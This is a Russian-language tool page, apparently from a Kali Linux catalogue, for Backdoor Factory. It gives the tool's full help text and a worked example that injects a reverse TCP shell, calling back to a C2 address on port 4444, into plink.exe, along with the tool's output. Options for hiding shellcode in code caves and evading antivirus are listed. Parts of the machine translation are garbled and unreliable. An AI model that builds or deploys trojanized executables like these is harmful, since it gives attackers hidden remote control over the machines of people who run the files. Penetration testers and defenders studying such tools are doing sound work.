//kalinux.info
Exploitation Tools 248 просмотров

Backdoor Factory

Описание пакета Backdoor Factory

Цель BDF - исполняемые исполняемые файлы с исполняемым файлом с запрошенным пользователем шеллкодом и продолжить нормальное выполнение предварительно подготовленного состояния.

Поддержка: Windows PE x32 / x64 и Linux ELF x32 / x64 (System V)

Некоторые исполняемые файлы имеют встроенные средства защиты, поэтому такие действия не будут работать во всех двоичных файлах. Желательно, чтобы вы тестировали целевые двоичные файлы, прежде чем развертывать их на клиентах или использовать их в упражнениях.

Инструменты, входящие в пакет backdoor-factory

backdoor-factory - Патч win32 / 64 двоичных файлов с шеллкодом


root@kali:~# backdoor-factory
-.(`-')  (`-')  _           <-.(`-') _(`-')                            (`-')
__( OO)  (OO ).-/  _         __( OO)( (OO ).->     .->        .->   <-.(OO )
'-'---.\  / ,---.   \-,-----.'-'. ,--.\    .'_ (`-')----. (`-')----. ,------,)
| .-. (/  | \ /`.\   |  .--./|  .'   /'`'-..__)( OO).-.  '( OO).-.  '|   /`. '
| '-' `.) '-'|_.' | /_) (`-')|      /)|  |  ' |( _) | |  |( _) | |  ||  |_.' |
| /`'.  |(|  .-.  | ||  |OO )|  .   ' |  |  / : \|  |)|  | \|  |)|  ||  .   .'
| '--'  / |  | |  |(_'  '--'\|  |\   \|  '-'  /  '  '-'  '  '  '-'  '|  |\  \
`------'  `--' `--'   `-----'`--' '--'`------'    `-----'    `-----' `--' '--'
           (`-')  _           (`-')                   (`-')
   <-.     (OO ).-/  _        ( OO).->       .->   <-.(OO )      .->
(`-')-----./ ,---.   \-,-----./    '._  (`-')----. ,------,) ,--.'  ,-.
(OO|(_\---'| \ /`.\   |  .--./|'--...__)( OO).-.  '|   /`. '(`-')'.'  /
 / |  '--. '-'|_.' | /_) (`-')`--.  .--'( _) | |  ||  |_.' |(OO \    /
 \_)  .--'(|  .-.  | ||  |OO )   |  |    \|  |)|  ||  .   .' |  /   /)
  `|  |_)  |  | |  |(_'  '--'\   |  |     '  '-'  '|  |\  \  `-/   /`
   `--'    `--' `--'   `-----'   `--'      `-----' `--' '--'   `--'


-h, --help                    показать это справочное сообщение и выйти из 
  -f FILE, --file = FILE      файл в backdoor 
  -s SHELL, --shell = SHELL   полезные данные  
                              , доступные для использования. 
  -H HOST, --hostip = HOST 
                              IP C2 для обратных соединений 
  -P PORT, --port = PORT      Порт для подключения обратно к обратным оболочкам 
                              или для прослушивания для bind-оболочек 
  -J, -cave_jumping           Выберите это если вы хотите использовать пещерку кода, 
                              чтобы скрыть свой шелл-код в двоичном формате. 
  -a, --add_new_section 
                              Обязательно добавить новый раздел в exe
                              (лучший успех), но меньше av-избегания 
  -U SUPPLIED_SHELLCODE, -user_shellcode = SUPPLIED_SHELLCODE 
                              Пользовательский шелл-код, указанный в коде , убедитесь, что он соответствует 
                              архитектуре, на которую вы нацеливаете. 
  -c, --cave                  Флаг пещеры найдет пещеры кода, которые можно использовать 
                              для шифрования шеллкода. Это будет печатать во всех 
                              педах кода определенного размера. Флаг -l может использоваться 
                              с этим параметром. 
  -l SHELL_LEN, --shell_length = SHELL_LEN 
                              Для использования с -c для поиска кодовых пещер разных 
                              размеров
  -o OUTPUT, --output-file = OUTPUT 
                              Выходной файл backdoor 
  -n NSECTION, -section = NSECTION Имя 
                              нового раздела должно быть меньше семи символов 
  -d DIR, -directory = DIR. 
                              Это расположение файлов, которые вы хотите 
                              бэкдор. Вы можете 
                              быстрее сделать каталог с файловым backdooring , заставив прикрепление кодека к 
                              exe с помощью параметра -a. 
  -w, --change_access         Этот флаг изменяет раздел, в котором содержится кодек 
                              для RWE. Иногда это необходимо. Включено
                              по умолчанию. Если отключено, бэкдор может выйти из строя. 
  -i, -injector               Эта команда превращает бэкдор-фабрику в режим охоты и 
                              shellcode, вводя тип мехинизма. Измените целевые 
                              настройки в модуле инжектора. 
  -u SUFFIX, --suffix = SUFFIX 
                              Для использования с инжектором помещает суффикс в исходный 
                              файл для удобства восстановления 
  -D, --delete_original 
                              Для использования с модулем инжектора. Эта команда удаляет 
                              исходный файл. Не для использования в производственных системах. 
                              * Автор не несет ответственности за глупые использования. *
  -O DISK_OFFSET, --disk_offset = DISK_OFFSET 
                              Начальная точка смещения диска в байтах. Некоторые авторы 
                              хотят обфускать их на смещение диска, чтобы избежать 
                              обратного проектирования, если вы обнаружите, что один из этих файлов 
                              использует этот флаг, после того, как вы найдете смещение. 
  -S, --support_check         Чтобы определить, поддерживается ли файл BDF перед обратным доступом к 
                              файлу. Для использования отдельно или с 
                              подробным. Эта проверка выполняется автоматически, если 
                              выполняется попытка backdooring. 
  -q, --no_banner             Убивает баннер. 
  -v, --verbose               Для вывода информации об отладке.

Пример использования backdoor-factory

Укажите двоичный код для бэкдора (-f /usr/share/windows-binaries/plink.exe) , установите IP-адрес подключения (-H 192.168.1.202) , порт подключения (-P 4444) и оболочку для использования (-s reverse_shell_tcp) :


root@kali:~# backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp
__________                __       .___                   
\______   \_____    ____ |  | __ __| _/____   ___________ 
 |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \ 
 |    |   \ / __ \\  \___|    </ /_/ (  <_> |  <_> )  | \/
 |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
        \/      \/     \/     \/    \/                    
___________              __                               
\_   _____/____    _____/  |_  ___________ ___.__.        
 |    __) \__  \ _/ ___\   __\/  _ \_  __ <   |  |        
 |     \   / __ \\  \___|  | (  <_> )  | \/\___  |        
 \___  /  (____  /\___  >__|  \____/|__|   / ____|        
     \/        \/     \/                   \/             





[*] В бэкдор-модуле 
[*] Проверка наличия бинарного 
файла [*] Сбор информации о файле 
[*] Чтение команд ввода win32 
[*] Поиск и настройка выделенного шеллкода 
[*] Создание win32-повтора выполнения 
[*] Ищите пещеры, которые будут соответствовать минимальному размеру шероховатого шрифта 358 
[*]. Все длины пещер: (358,) 
######################## ####################################
Следующие пещеры могут использоваться для ввода кода и, возможно, 
продолжения выполнения. 
** Не нравится то, что вы видите? Используйте переход, одиночный или 
добавочный . ** ######################################### #################### 
[*] Длина пещеры 1 как int: 358 
[*] Доступные пещеры: 
1. Название секции :  None; Section Begin: None End: None; Cave begin: 0x280 End: 0x1000; Cave Size: 3456
2. Название раздела:  .text; Section Begin: 0x1000 End: 0x37000; Cave begin: 0x36981 End: 0x37000; Cave Size: 1663
3. Название раздела:  None; Section Begin: None End: None; Cave begin: 0x47cec End: 0x48004; Cave Size: 792
4. Название раздела:  .data; Section Begin: 0x48000 End: 0x4a000; Cave begin: 0x48961 End: 0x48b90; Cave Size: 559
5. Название раздела:  None; Section Begin: None End: None; Cave begin: 0x4907c End: 0x4a00e; Cave Size: 3986
********************************************** **** 
[!] Введите ваш выбор: 2 
Использование выделения: 2 
[*] Изменение флажков секций 
[*] Исправление начальных инструкций ввода 
[*] Создание win32 resume execute stub 
[*] / usr / share / windows-binaries / plink .exe backdooring complete 
Файл /usr/share/windows-binaries/plink.exe находится в каталоге "backdoored"